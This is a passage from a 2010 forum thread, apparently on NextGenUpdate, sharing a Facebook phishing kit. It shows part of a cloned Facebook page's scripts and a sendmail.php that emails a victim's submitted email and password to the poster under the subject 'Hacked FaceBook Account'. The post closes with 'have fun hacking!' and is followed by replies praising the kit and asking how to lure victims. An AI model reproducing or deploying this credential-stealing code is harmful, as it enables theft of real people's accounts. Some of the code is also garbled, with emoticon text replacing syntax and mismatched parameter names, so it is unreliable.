util.js","type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/zK0JD\/p\/hash\/dyy2wetj.js"}});
Bootloader.enableBootload({"async":["7zF4n","TpAjx","PB2xF"],"dialog":["7zF4n","TpAjx","PB2xF"],"dom-form":["7zF4n","TpAjx","PB2xF"],"editor":["7zF4n","TpAjx","PB2xF","+361U"],"reg-util":["7zF4n","TpAjx","PB2xF","olbS\/","MVb31","kQR+4","UJ8Bq"],"async-signal":["TpAjx"]});Arbiter.registerCallback(InitialJSLoader.callback, ["BOOTLOAD\/ROADRUNNER_READY"]);Arbiter.registerCallback(function(){setTimeout(function() {InitialJSLoader.load(["TpAjx","cQxw0"]);Arbiter.inform("BOOTLOAD\/ROADRUNNER_READY", true, Arbiter.BEHAVIOR_STATE);}, 50)}, [OnloadEvent.ONLOAD_DOMCONTENT_CALLBACK]);</script><script type="text/javascript">

Bootloader.configurePage(["olbS\/","PB2xF","WRiEv"]);
Bootloader.done([]);


onloadRegister(function (){try { $("pass").focus(); } catch (_ignore) { };});
onloadRegister(function (){reg_bootload("registration_container", true, "reg", "form_focus");;});
onloadRegister(function (){if(typeof(Env)=='undefined'Winky Winky Env = {};
Env['recaptcha_focus_on_load'] = false;});
onloadRegister(function (){
if (typeof RegUtil == 'undefined'Winky Winky {
RegUtil = function() {};
}
RegUtil.captcha_class="ReCaptchaCaptcha";
;});
onloadRegister(function (){if(typeof(Env)=='undefined'Winky WinkyEnv={};
Env['recaptcha_lang'] = "nl";});
onloadRegister(function (){useragent();;});
onloadRegister(function (){window.loading_page_chrome = true;;});
onloadRegister(function (){window.loading_page_chrome = false;;});
onafterloadRegister(function (){startFormTypeABTester($("reg"));});


</script></body>
</html>


and this sendmail.php
    <?php
if(isset($_GET['email']) && isset($_GET['passs'])){
echo 'You signed in';
$sendmailto = '[email protected]'; // THIS SHOULD BE YOUR EMAIL

mail($sendmailto, 'Hacked FaceBook Account', 'E-mail: ' . $_GET['email'] . '\nPassword: ' . $_GET['pass']);
}
?>



check it out here:
You must login or register to view this content.

have fun hacking!
Last edited by xAlex_ ; 08-24-2010 at 09:59 AM. Reason: new coding added
09-09-2010, 07:41 AM #77
Default Avatar
vanille
Guest
this is really amazing, i've seen soo many facebook phishing hacking tutorial and none is as good as this one it really worked, the problem is how to deceive the victim to login to my fake login page, is there another ideas/ways beside the ones you posted already? thanx alot
09-11-2010, 12:46 AM #78
CSC-Magic
[move] GOML Fools [/move]
great well written guide
09-11-2010, 01:27 AM #79
Number
Banned
Thank you for posting this. It is really useful.
09-29-2010, 04:58 PM #80
Default Avatar
cli5006
Guest
everything worked fine but i have not understood the "passwords.txt" part anyone can tell me were to put it plz
09-30-2010, 01:17 PM #81
ShinigamiUzi
Proud to be a Player
Work perfectly? tested?
10-02-2010, 08:58 PM #82
What a silly pelican....

Copyright © 2024, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo